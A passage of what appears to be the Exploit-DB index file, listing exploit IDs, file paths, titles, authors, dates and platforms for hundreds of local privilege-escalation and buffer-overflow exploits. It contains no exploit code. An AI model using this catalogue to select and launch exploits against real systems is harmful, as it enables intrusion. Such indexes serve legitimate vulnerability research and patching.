System Call File Existence",2003-04-04,"Andrew Griffiths",local,linux, +22465,exploits/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 - Local Privilege Escalation",2012-11-04,"Craig Freyman",local,windows, +22528,exploits/windows/local/22528.c,"Microsoft Windows Server 2000 - 'RegEdit.exe' Registry Key Value Buffer Overflow",2003-04-09,ThreaT,local,windows, +22531,exploits/linux/local/22531.pl,"SAP Database 7.3/7.4 - SDBINST Race Condition",2003-04-23,"Larry W. Cashdollar",local,linux, +22538,exploits/linux/local/22538.pl,"Libopt.a 3.1x - Error Logging Buffer Overflow (2)",2003-04-24,jlanthea,local,linux, +22540,exploits/linux/local/22540.c,"Linux-ATM LES 2.4 - Command Line Argument Buffer Overflow",2003-02-18,"Angelo Rosiello",local,linux, +22564,exploits/windows/local/22564.c,"FlashFXP 1.4 - User Password Encryption",2003-05-05,DVDMAN,local,windows, +22565,exploits/linux/local/22565.c,"MySQL 3.x/4.0.x - Weak Password Encryption",2003-05-05,"Secret Squirrel",local,linux, +22566,exploits/freebsd/local/22566.pl,"Youbin 2.5/3.0/3.4 - HOME Buffer Overflow",2003-05-06,"Knud Erik Hojgaard",local,freebsd, +22567,exploits/linux/local/22567.c,"Leksbot 1.2 - Multiple Vulnerabilities",2003-05-06,gunzip,local,linux, +22573,exploits/freebsd/local/22573.pl,"ListProc 8.2.9 - Catmail ULISTPROC_UMASK Buffer Overflow",2003-05-08,kf,local,freebsd, +22574,exploits/freebsd/local/22574.pl,"Lgames LTris 1.0.1 - Local Memory Corruption",2003-05-09,"Knud Erik Hojgaard",local,freebsd, +22580,exploits/freebsd/local/22580.c,"Firebird 1.0 - GDS_Inet_Server Interbase Environment Variable Buffer Overflow",2003-05-10,bob,local,freebsd, +22594,exploits/linux/local/22594.c,"CDRTools CDRecord 1.11/2.0 - Devname Format String",2003-05-13,CMN,local,linux, +22613,exploits/freebsd/local/22613.pl,"Maelstrom Server 3.0.x - Argument Buffer Overflow (1)",2003-05-20,"Luca Ercoli",local,freebsd, +22614,exploits/freebsd/local/22614.c,"Maelstrom Server 3.0.x - Argument Buffer Overflow (2)",2003-05-23,ph4nt0m,local,freebsd, +22615,exploits/freebsd/local/22615.c,"Maelstrom Server 3.0.x - Argument Buffer Overflow (3)",2003-05-20,CMN,local,freebsd, +22616,exploits/linux/local/22616.pl,"Maelstrom Player 3.0.x - Argument Buffer Overflow (1)",2003-05-21,"Luca Ercoli",local,linux, +22617,exploits/linux/local/22617.c,"Maelstrom Player 3.0.x - Argument Buffer Overflow (2)",2003-05-20,knight420,local,linux, +22628,exploits/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 - LSF_ENVDIR Local Command Execution",2003-03-20,"Tomasz Grabowski",local,multiple, +22633,exploits/linux/local/22633.c,"Polymorph 0.4 - Filename Buffer Overflow",2003-05-22,demz,local,linux, +22640,exploits/linux/local/22640.c,"UML_NET - Integer Mismanagement Code Execution",2003-05-23,ktha@hushmail.com,local,linux, +22643,exploits/linux/local/22643.pl,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (1)",2003-05-26,jlanthea,local,linux, +22644,exploits/linux/local/22644.c,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (2)",2003-05-26,jsk,local,linux, +22645,exploits/linux/local/22645.c,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (3)",2003-05-26,"Julien L",local,linux, +22652,exploits/windows/local/22652.py,"Zoner Photo Studio 15 Build 3 - 'Zps.exe' Registry Value Parsing",2012-11-12,"Julien Ahrens",local,windows, +22661,exploits/freebsd/local/22661.c,"Upclient 5.0 b7 - Command Line Argument Buffer Overflow",2003-05-27,"Gino Thomas",local,freebsd, +22683,exploits/linux/local/22683.pl,"HT Editor 2.0.20 - Local Buffer Overflow (ROP) (PoC)",2012-11-13,ZadYree,local,linux, +22695,exploits/linux/local/22695.pl,"RedHat 9.0 / Slackware 8.1 - '/bin/mail' Carbon Copy Field Buffer Overrun",2003-05-30,mark@vulndev.org,local,linux, +22703,exploits/linux/local/22703.c,"XMame 0.6x - Lang Local Buffer Overflow",2003-03-31,"Gabriel A. Maggiotti",local,linux, +22719,exploits/linux/local/22719.pl,"kon2 - Local Buffer Overflow (1)",2003-06-03,wsxz,local,linux, +22720,exploits/linux/local/22720.c,"kon2 - Local Buffer Overflow (2)",2003-06-03,c0ntex,local,linux, +22727,exploits/multiple/local/22727.pl,"Computer Associates - Unicenter Asset Manager Stored Secret Data Decryption",2003-03-19,kufumo.com,local,multiple, +22729,exploits/linux/local/22729.c,"Man 1.5.1 - Catalog File Format String",2003-06-04,V9,local,linux, +22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",local,multiple, +22745,exploits/linux/local/22745.c,"Zblast 1.2 - 'Username' Local Buffer Overrun",2003-06-06,V9,local,linux, +22748,exploits/linux/local/22748.c,"Xaos 3.0 - Language Option Local Buffer Overflow",2003-06-06,bazarr@ziplip.com,local,linux, +40410,exploits/windows/local/40410.txt,"AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation",2016-09-22,Tulpa,local,windows, +22756,exploits/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 - 'LSMCODE' Environment Variable Local Buffer Overflow",2003-06-01,watercloud,local,aix, +22768,exploits/linux/local/22768.pl,"ATFTP 0.7 - Timeout Command Line Argument Local Buffer Overflow",2003-06-06,"Julien LANTHEA",local,linux, +22773,exploits/linux/local/22773.c,"Progress Database 9.1 - Environment Variable Privilege Escalation",2003-06-14,kf,local,linux, +22775,exploits/linux/local/22775.txt,"FreeWnn 1.1.1 - JServer Logging Option Data Corruption",2003-06-14,"Stefano Di Paola",local,linux, +22779,exploits/windows/local/22779.pl,"Mailtraq 2.1.0.1302 - User Password Encoding",2003-06-16,"Noam Rathaus",local,windows, +22781,exploits/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",local,linux, +22806,exploits/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,local,linux, +22811,exploits/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,local,bsd, +22813,exploits/linux/local/22813.c,"Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure",2003-06-20,IhaQueR,local,linux, +22815,exploits/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,local,linux, +40409,exploits/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",local,windows, +22835,exploits/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - 'fgets()' Local Buffer Overrun",2003-06-24,posidron,local,windows, +22836,exploits/linux/local/22836.pl,"Elm 2.3/2.4 - TERM Environment Variable Local Buffer Overrun",1997-05-13,kokanin,local,linux, +22840,exploits/linux/local/22840.c,"Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read (PoC)",2003-06-26,IhaQueR,local,linux, +22847,exploits/linux/local/22847.txt,"InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions",2003-07-01,"Larry W. Cashdollar",local,linux, +22851,exploits/windows/local/22851.py,"FormatFactory 3.0.1 - Profile File Handling Buffer Overflow",2012-11-20,"Julien Ahrens",local,windows, +22860,exploits/linux/local/22860.c,"GNU Chess 5.0 - Local Buffer Overflow",2003-07-03,ace,local,linux, +22861,exploits/linux/local/22861.c,"GNU AN - Command Line Option Local Buffer Overflow",2003-07-03,ace,local,linux, +22862,exploits/linux/local/22862.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (1)",2003-07-03,ace,local,linux, +22863,exploits/linux/local/22863.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (2)",2003-07-04,snooq,local,linux, +22870,exploits/windows/local/22870.txt,"Microsoft Windows XP/2000 - 'RunDLL32.exe' Local Buffer Overflow",2003-07-06,"Rick Patel",local,windows, +23037,exploits/windows/local/23037.txt,"DWebPro 3.4.1 - Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,local,windows, +22882,exploits/windows/local/22882.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (1)",2003-07-08,Maceo,local,windows, +22883,exploits/windows/local/22883.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2)",2003-07-08,Maceo,local,windows, +22884,exploits/linux/local/22884.c,"Tower Toppler 0.96 - 'HOME Environment' Local Buffer Overflow",2003-07-08,FBHowns,local,linux, +22911,exploits/php/local/22911.php,"PHP 4.3.x - Undefined Safe_Mode_Include_Dir Safemode Bypass",2003-07-16,"Michal Krause",local,php, +22912,exploits/unix/local/22912.txt,"IBM UniVerse 10.0.0.9 - 'uvadmsh' Local Privilege Escalation",2003-07-16,kf,local,unix, +22943,exploits/linux/local/22943.c,"Top 1.x/2.0 - 'HOME Environment' Local Buffer Overflow",2003-07-22,UHAGr,local,linux, +22946,exploits/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 - Plain Text Password",2003-07-22,hanez,local,windows, +22965,exploits/linux/local/22965.c,"XBlast 2.6.1 - 'HOME Environment' Local Buffer Overflow",2003-07-28,c0wboy,local,linux, +22923,exploits/unix/local/22923.c,"Tolis Group BRU 17.0 - Local Privilege Escalation (1)",2003-07-16,DVDMAN,local,unix, +22924,exploits/unix/local/22924.c,"Tolis Group BRU 17.0 - Local Privilege Escalation (2)",2003-07-16,nic,local,unix, +22928,exploits/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,local,linux, +22931,exploits/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - Direct RETN",2012-11-26,Nezim,local,windows, +22932,exploits/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn",2012-11-26,Nezim,local,windows, +23007,exploits/windows/local/23007.rb,"Microsoft Windows - AlwaysInstallElevated MSI (Metasploit)",2012-11-29,Metasploit,local,windows, +22939,exploits/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow",2003-07-21,inv[at]dtors,local,unix, +22971,exploits/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow",2003-07-29,V9,local,linux, +22979,exploits/linux/local/22979.txt,"CDRTools 2.0 - RSCSI Debug File Arbitrary Local File Manipulation",2003-08-01,"Secure Network Operations",local,linux, +22980,exploits/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite",2003-08-02,"Lord Yup",local,windows, +22984,exploits/linux/local/22984.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (1)",2003-08-04,V9,local,linux, +22985,exploits/linux/local/22985.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (2)",2003-08-04,techieone@softhome.net,local,linux, +22988,exploits/unix/local/22988.sh,"IBM DB2 db2job - File Overwrite",2003-08-05,"Juan Manuel Pascual Escribá",local,unix, +22989,exploits/unix/local/22989.pl,"IBM DB2 - Shared Library Injection",2003-08-05,daniels@legend.co.uk,local,unix, +22993,exploits/linux/local/22993.txt,"IPNetSentryX / IPNetMonitorX - Unauthorized Network Reconnaissance",2003-07-07,@stake,local,linux, +22996,exploits/linux/local/22996.c,"XPCD 2.0.8 - 'HOME Environment' Local Buffer Overflow",2003-07-18,r-code,local,linux, +23022,exploits/php/local/23022.c,"PHP 4.x - DLOpen Memory Disclosure (1)",2003-08-13,"Andrew Griffiths",local,php, +23023,exploits/php/local/23023.c,"PHP 4.x - DLOpen Memory Disclosure (2)",2003-08-13,andrewg,local,php, +23041,exploits/windows/local/23041.txt,"DeskSoft CheckMail 1.2 - Password Disclosure",2003-08-19,"cyber talon",local,windows, +23045,exploits/linux/local/23045.pl,"ViRobot Linux Server 2.0 - Local Overflow",2003-08-20,kf,local,linux, +23046,exploits/openbsd/local/23046.c,"OpenBSD 3.3 - 'Semget()' Integer Overflow (1)",2003-08-20,blexim,local,openbsd, +23047,exploits/openbsd/local/23047.c,"OpenBSD 3.3 - 'Semget()' Integer Overflow (2)",2003-08-20,blexim,local,openbsd, +23052,exploits/windows/local/23052.rb,"BlazeVideo HDTV Player Pro 6.6 - Filename Handling (Metasploit)",2012-12-01,Metasploit,local,windows, +23062,exploits/bsd/local/23062.c,"BSD-Games 2.x - Monop Player Name Local Buffer Overrun (1)",2003-08-25,^sq,local,bsd, +23063,exploits/bsd/local/23063.c,"BSD-Games 2.x - Monop Player Name Local Buffer Overrun (2)",2003-08-25,N4rK07IX,local,bsd, +23077,exploits/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Escalation",2012-12-02,kingcope,local,linux, +23096,exploits/windows/local/23096.txt,"Microsoft WordPerfect - Converter Buffer Overrun",2003-09-03,valgasu,local,windows, +23119,exploits/linux/local/23119.c,"Apache::Gallery 0.4/0.5/0.6 - Insecure File Storage Privilege Escalation",2003-09-09,"Jon Hart",local,linux, +23126,exploits/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",local,linux, +23141,exploits/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' 'REMOTE_ADDR' Authentication Bypass",2003-09-15,Texonet,local,sco, +23143,exploits/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,local,sco, +23154,exploits/linux/local/23154.c,"Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",local,linux, +23168,exploits/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Escalation",2003-09-22,"Sebastian Krahmer",local,linux, +23189,exploits/linux/local/23189.c,"marbles 1.0.1 - Local Home Environment Variable Buffer Overflow",2003-09-26,demz,local,linux, +23197,exploits/linux/local/23197.c,"Mah-Jong 1.4 - MJ-Player Server Flag Local Buffer Overflow",2003-09-29,jsk,local,linux, +23204,exploits/linux/local/23204.c,"Silly Poker 0.25.5 - Local HOME Environment Variable Buffer Overrun",2003-09-30,demz,local,linux, +23210,exploits/windows/local/23210.c,"Microsoft Windows XP/2000 - PostThreadMessage() Arbitrary Process Killing",2003-10-02,"Brett Moore",local,windows, +23223,exploits/linux/local/23223.c,"SuSE Linux Professional 8.2 - SuSEWM Configuration File Insecure Temporary File",2003-10-06,"Nash Leon",local,linux, +23228,exploits/linux/local/23228.c,"SLocate 2.6 - User-Supplied Database Heap Overflow",2003-10-06,"Patrik Hornik",local,linux, +23251,exploits/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Local Privilege Escalation",2012-12-09,"Larry W. Cashdollar",local,linux, +23255,exploits/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control - 'User32.dll' Buffer Overrun",2003-10-15,"Brett Moore",local,windows, +23258,exploits/linux/local/23258.c,"Oracle Database Server 9.0.x - Oracle Binary Local Buffer Overflow",2003-10-17,c0ntex,local,linux, +23297,exploits/linux/local/23297.c,"Musicqueue 1.2 - SIGSEGV Signal Handler Insecure File Creation",2003-10-27,"dong-h0un U",local,linux, +23299,exploits/linux/local/23299.c,"Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1)",2003-10-27,axis,local,linux, +23300,exploits/linux/local/23300.c,"Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (2)",2003-11-11,heka,local,linux, +23301,exploits/linux/local/23301.c,"Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (3)",2003-10-27,NrAziz,local,linux, +23303,exploits/linux/local/23303.c,"Musicqueue 0.9/1.0/1.1 - Multiple Buffer Overrun Vulnerabilities",2003-10-27,"dong-h0un U",local,linux, +23308,exploits/linux/local/23308.c,"kpopup 0.9.x - Privileged Command Execution",2003-10-28,b0f,local,linux, +23327,exploits/windows/local/23327.txt,"DATEV Nutzungskontrolle 2.1/2.2 - Unauthorized Access",2003-11-01,t4rku5,local,windows, +23341,exploits/hp-ux/local/23341.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (1)",2003-04-01,watercloud,local,hp-ux, +23342,exploits/hp-ux/local/23342.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (2)",2003-04-01,watercloud,local,hp-ux, +23343,exploits/hp-ux/local/23343.c,"HP-UX 11 - Software Distributor Lang Environment Variable Local Buffer Overrun",2002-12-11,watercloud,local,hp-ux, +23344,exploits/linux/local/23344.txt,"IBM DB2 - 'db2start' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,local,linux, +23345,exploits/linux/local/23345.txt,"IBM DB2 - 'db2stop' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,local,linux, +23346,exploits/linux/local/23346.txt,"IBM DB2 - 'db2govd' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,local,linux, +23350,exploits/linux/local/23350.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (1)",2003-11-07,c0wboy,local,linux, +23351,exploits/linux/local/23351.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (2)",2003-11-07,Bobby,local,linux, +23352,exploits/linux/local/23352.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)",2003-11-07,"m00 security",local,linux, +23364,exploits/linux/local/23364.sh,"WMAPM 3.1 - Local Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",local,linux, +23414,exploits/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-Directory Command Execution",2003-12-05,auto22238,local,linux, +23479,exploits/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",local,linux, +23481,exploits/linux/local/23481.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",local,linux, +23482,exploits/linux/local/23482.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",local,linux, +23510,exploits/linux/local/23510.c,"XSOK 1.0 2 - 'LANG Environment' Local Buffer Overrun",2003-12-30,N2n-Hacker,local,linux, +23511,exploits/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,local,windows, +23581,exploits/linux/local/23581.pl,"Apache 2.0.4x mod_perl - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",local,linux, +23609,exploits/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,local,unix, +23610,exploits/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,local,unix, +23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",local,multiple, +23634,exploits/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,local,linux, +23655,exploits/bsd/local/23655.txt,"BSD - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",local,bsd, +23658,exploits/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",local,linux, +23674,exploits/linux/local/23674.txt,"Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",local,linux, +23682,exploits/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,local,linux, +23738,exploits/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,local,linux, +23739,exploits/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Local Privilege Escalation",2004-02-22,"Ian Vitek",local,windows, +23743,exploits/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Local Privilege Escalation",2003-02-23,"Tomasz Grabowski",local,linux, +23759,exploits/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Local Privilege Escalation",2004-02-25,"Sebastian Krahmer",local,linux, +23783,exploits/windows/local/23783.rb,"BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploit)",2012-12-31,"Craig Freyman",local,windows, +23838,exploits/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,local,aix, +23840,exploits/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,local,aix, +23841,exploits/aix/local/23841.c,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (2)",2004-03-17,mattox,local,aix, +23849,exploits/linux/local/23849.txt,"FVWM 2.4.17/2.5.8 - fvwm_make_browse_menu.sh Scripts Command Execution",2004-03-19,"Dominik Vogt",local,linux, +23874,exploits/solaris/local/23874.txt,"Sun Solaris 2.6/7.0/8/9 - vfs_getvfssw function Privilege Escalation",2004-03-23,"Sinan Eren",local,solaris, +23882,exploits/linux/local/23882.pas,"NetSupport School 7.0/7.5 - Weak Password Encryption",2004-03-26,"spiffomatic 64",local,linux, +23883,exploits/aix/local/23883.pl,"AIX 4.3.3/5.1 - Invscoutd Symbolic Link",2003-05-29,watercloud,local,aix, +23892,exploits/linux/local/23892.c,"Systrace 1.x - Local Policy Bypass",2004-03-29,Brad,local,linux, +23910,exploits/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Local Privilege Escalation",2004-04-06,"Ian Vitek",local,windows, +23921,exploits/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,local,windows, +40400,exploits/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",local,windows, +23989,exploits/windows/local/23989.c,"Microsoft Windows NT 4.0/2000 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,local,windows, +23996,exploits/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'File Memory Corruption / Arbitrary Code Execution",2013-01-09,"Debasish Mandal",local,windows, +24014,exploits/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",local,windows, +24015,exploits/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,local,bsd, +24027,exploits/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",local,linux, +24043,exploits/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Memory Read",2004-04-23,"Brad Spengler",local,linux, +24062,exploits/unix/local/24062.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (1)",2004-04-25,"Secure Network Operations",local,unix, +24063,exploits/unix/local/24063.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (2)",2004-04-25,"Secure Network Operations",local,unix, +24064,exploits/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",local,unix, +24113,exploits/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation",2004-05-11,"Stefan Esser",local,bsd, +24123,exploits/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",local,linux, +24141,exploits/linux/local/24141.txt,"cPanel 5 < 9 - Local Privilege Escalation",2004-05-24,"Rob Brown",local,linux, +24171,exploits/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",local,windows, +24173,exploits/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape functions Command Execution",2004-06-07,"Daniel Fabian",local,php, +24182,exploits/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",local,linux, +24200,exploits/windows/local/24200.txt,"Sygate Personal Firewall Pro 5.5 - Local Fail-Close Bypass",2004-06-14,"Tan Chew Keong",local,windows, +24207,exploits/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Local Buffer Overflow",2013-01-18,"Jon Bailey",local,windows, +24210,exploits/hp-ux/local/24210.pl,"HP-UX 7-11 - X Font Server Local Buffer Overflow",2003-03-10,watercloud,local,hp-ux, +24258,exploits/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Local Privilege Escalation",2013-01-20,LiquidWorm,local,windows, +24277,exploits/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow / Privilege Escalation (MS04-020)",2004-07-16,bkbll,local,windows, +24278,exploits/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",local,linux, +24293,exploits/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",local,sco, +24335,exploits/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",local,unix, +24366,exploits/windows/local/24366.rb,"Microsoft Windows - Manage Memory Payload Injection (Metasploit)",2013-01-25,Metasploit,local,windows, +24374,exploits/windows/local/24374.c,"Ipswitch IMail Server 7/8 - Weak Password Encryption",1999-12-20,Adik,local,windows, +24398,exploits/linux/local/24398.sh,"IMWheel 1.0 - Predictable Temporary File Creation",2004-08-23,I)ruid,local,linux, +24406,exploits/linux/local/24406.txt,"GNU a2ps 4.13 - File Name Command Execution",2004-08-24,"Rudolf Polzer",local,linux, +24421,exploits/linux/local/24421.c,"Debian bsdmainutils 6.0.14 - Calendar Information Disclosure",2004-08-31,"Steven Van Acker",local,linux, +24458,exploits/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",local,linux, +24459,exploits/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure",2013-02-05,vladz,local,linux, +24505,exploits/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",local,windows, +24555,exploits/lin_x86-64/local/24555.c,"Linux Kernel 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Local Privilege Escalation (1)",2013-02-27,sd,local,lin_x86-64, +24570,exploits/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",local,linux, +24578,exploits/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation (Metasploit)",2013-03-05,Metasploit,local,osx, +24579,exploits/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)",2013-03-05,Metasploit,local,osx, +24606,exploits/linux/local/24606.c,"Sudo 1.6.8 - Information Disclosure",2004-09-18,"Rosiello Security",local,linux, +24608,exploits/osx/local/24608.txt,"MacOSXLabs RsyncX 2.1 - Local Privilege Escalation",2004-09-17,"Matt Johnston",local,osx, +24609,exploits/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 - Insecure Temporary File Creation",2004-09-17,"Matt Johnston",local,osx, +24678,exploits/windows/local/24678.txt,"IBM DB2 - Universal Database Information Disclosure",2004-09-01,"Chris Anley",local,windows, +24682,exploits/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,local,windows, +24694,exploits/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,local,linux, +24746,exploits/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",local,lin_x86-64, +24749,exploits/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation (1)",2004-11-17,Gangstuck,local,linux, +24750,exploits/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation (2)",2004-11-17,Gangstuck,local,linux, +24753,exploits/windows/local/24753.txt,"Mailtraq 2.x - Administration Console Privilege Escalation",2004-11-19,"Reed Arvin",local,windows, +24754,exploits/windows/local/24754.txt,"Altiris Deployment Solution 5.6 - Client Service Privilege Escalation",2004-11-19,"Reed Arvin",local,windows, +24757,exploits/linux/local/24757.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",local,linux, +24758,exploits/linux/local/24758.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",local,linux, +24863,exploits/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control",2013-03-20,Dr_IDE,local,windows, +24872,exploits/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Local Privilege Escalation",2013-03-22,"Julien Ahrens",local,windows, +24884,exploits/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File 